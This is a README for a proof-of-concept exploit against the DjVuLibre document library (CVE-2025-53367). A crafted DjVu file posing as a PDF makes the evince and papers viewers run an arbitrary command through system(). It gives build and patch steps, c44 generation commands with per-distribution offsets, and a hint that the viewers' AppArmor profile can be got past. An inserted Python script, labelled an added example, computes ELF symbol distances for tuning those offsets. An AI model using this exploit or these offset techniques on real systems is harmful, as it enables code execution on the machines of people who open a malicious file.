# Proof of concept for DjVuLibre CVE-2025-53367

This poc uses CVE-2025-53367 to achieve code execution in the default PDF viewer on many Linux distributions, evince or papers, both of which open DjVu documents through the DjVuLibre library.

Because the DjVuLibre file format is quite complicated, it was easiest to create the poc by reusing the DjVuLibre codebase and modifying one of its tools (c44) to generate the poc file. So to build the poc, clone the official DjVuLibre repo, check out the pinned commit, and apply the patch that ships alongside this README:

```sh
git clone https://git.code.sf.net/p/djvu/djvulibre-git DjVuLibre-poc-CVE-2025-53367
cd DjVuLibre-poc-CVE-2025-53367
git checkout 4a285e8da5cd9a2a6b296242a952ee96e519280d
git apply ../DjVuLibre-poc-CVE-2025-53367.diff
```

Build it like this:

```sh
./autogen.sh --prefix=`pwd`/install
make install
```

Now generate the poc file like this:

```sh
./install/bin/c44 0x1010 0x4770 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" plucky.pdf  # Ubuntu 25.04
./install/bin/c44 0x1010 0x4360 "google-chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ" noble.pdf   # Ubuntu 24.04
```

The first two parameters are offsets that need to be tuned for each Linux distribution (and for each build of the libraries): the first is the distance between two pointers in libdjvulibre.so, the second is the distance between two pointers in libc.so. The third parameter is the command string that will be passed to system(). Note that evince/papers run under an AppArmor profile which blocks some commands. It is not very restrictive, so there are ways of getting past it. Use the aa-exec tool to check what the profile permits before choosing a payload:

```sh
aa-exec -d -v -p /usr/bin/papers /bin/bash -c "echo 1337 > ~/pwned.txt"
```
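The two offsets are constants of a particular build of libdjvulibre and libc, and they do not depend on the ASLR load address because each pair of pointers lives inside one shared object. The script below is an added example, not part of this poc or of DjVuLibre, that computes such a distance from a shared object's dynamic symbol table using only the Python standard library, then cross-checks the static value against the live process. The symbol names `system` and `getenv` are placeholders: this README does not say which two pointers the offsets actually measure, so substitute the symbols you need for your target.

```python
"""Added example (not part of the DjVuLibre poc): distance between two
dynamic symbols of a shared object, i.e. the kind of per-distribution
constant the c44 offset parameters encode.

Parses the ELF .dynsym/.dynstr tables directly; little-endian ELF64 only.
"""
import ctypes
import os
import struct
import sys

SHT_DYNSYM = 11
SHN_UNDEF = 0


def dynsym_addresses(path):
    """Return {name: st_value} for every defined dynamic symbol in `path`.

    st_value is relative to the object's load base, so the difference between
    two entries is the same on disk and in a running process despite ASLR.
    """
    with open(path, "rb") as f:
        data = f.read()
    if data[:4] != b"\x7fELF":
        raise ValueError("%s is not an ELF file" % path)
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is handled here")

    (e_shoff,) = struct.unpack_from("<Q", data, 0x28)
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)
    # Elf64_Shdr: name, type, flags, addr, offset, size, link, info, align, entsize
    sections = [
        struct.unpack_from("<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
        for i in range(e_shnum)
    ]

    symbols = {}
    for sh in sections:
        if sh[1] != SHT_DYNSYM:
            continue
        strtab_off = sections[sh[6]][4]  # sh_link points at the matching .dynstr
        sym_off, sym_size, entsize = sh[4], sh[5], sh[9] or 24
        for pos in range(sym_off, sym_off + sym_size, entsize):
            # Elf64_Sym: name, info, other, shndx, value, size
            st_name, _info, _other, st_shndx, st_value, _size = struct.unpack_from(
                "<IBBHQQ", data, pos)
            if st_shndx == SHN_UNDEF or st_name == 0:
                continue  # imported or nameless entry, no address to compare
            end = data.index(b"\0", strtab_off + st_name)
            name = data[strtab_off + st_name:end].decode("ascii", "replace")
            symbols.setdefault(name, st_value)  # first entry (default version) wins
    if not symbols:
        raise ValueError("no .dynsym section in %s" % path)
    return symbols


def symbol_distance(path, sym_from, sym_to):
    """Distance in bytes from sym_from to sym_to inside one shared object."""
    symbols = dynsym_addresses(path)
    return symbols[sym_to] - symbols[sym_from]


def runtime_distance(soname, sym_from, sym_to):
    """Same distance measured on the live process via dlsym (functions only).

    Beware IFUNC symbols such as strlen: dlsym returns the CPU-selected
    implementation, so for those the runtime distance differs from st_value.
    """
    lib = ctypes.CDLL(soname)
    addr = lambda name: ctypes.cast(getattr(lib, name), ctypes.c_void_p).value
    return addr(sym_to) - addr(sym_from)


def find_libc_path():
    """Path of the glibc mapped into this process, or None (Linux only)."""
    try:
        ctypes.CDLL("libc.so.6")
        with open("/proc/self/maps") as maps:
            for line in maps:
                parts = line.split()
                base = os.path.basename(parts[-1]) if len(parts) >= 6 else ""
                if base.startswith("libc.so") or base.startswith("libc-"):
                    return parts[-1]
    except OSError:
        pass
    return None


if __name__ == "__main__":
    # usage: symdist.py LIB.so SYM_FROM SYM_TO   (symbol names are placeholders)
    lib_path, sym_from, sym_to = sys.argv[1:4]
    print("0x%x" % symbol_distance(lib_path, sym_from, sym_to))
```

Run it as `python3 symdist.py /usr/lib/x86_64-linux-gnu/libc.so.6 system getenv` (the library path is an assumption for a Debian-style multiarch layout; use `ldd /usr/bin/evince` or `/proc/<pid>/maps` to find the exact libdjvulibre and libc files the viewer loads). The static and runtime distances agree for ordinary functions, which is why a single pair of offsets works for every process on a given distribution build but must be recomputed whenever the package is rebuilt.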

## Original fuzzer-generated poc

We published this (much simpler) version of the poc first, so that people could quickly test whether they are running a vulnerable version of DjVuLibre. It only causes the DjVuLibre library to crash; it does not achieve code execution.

Fuzzer-generated poc file

Links: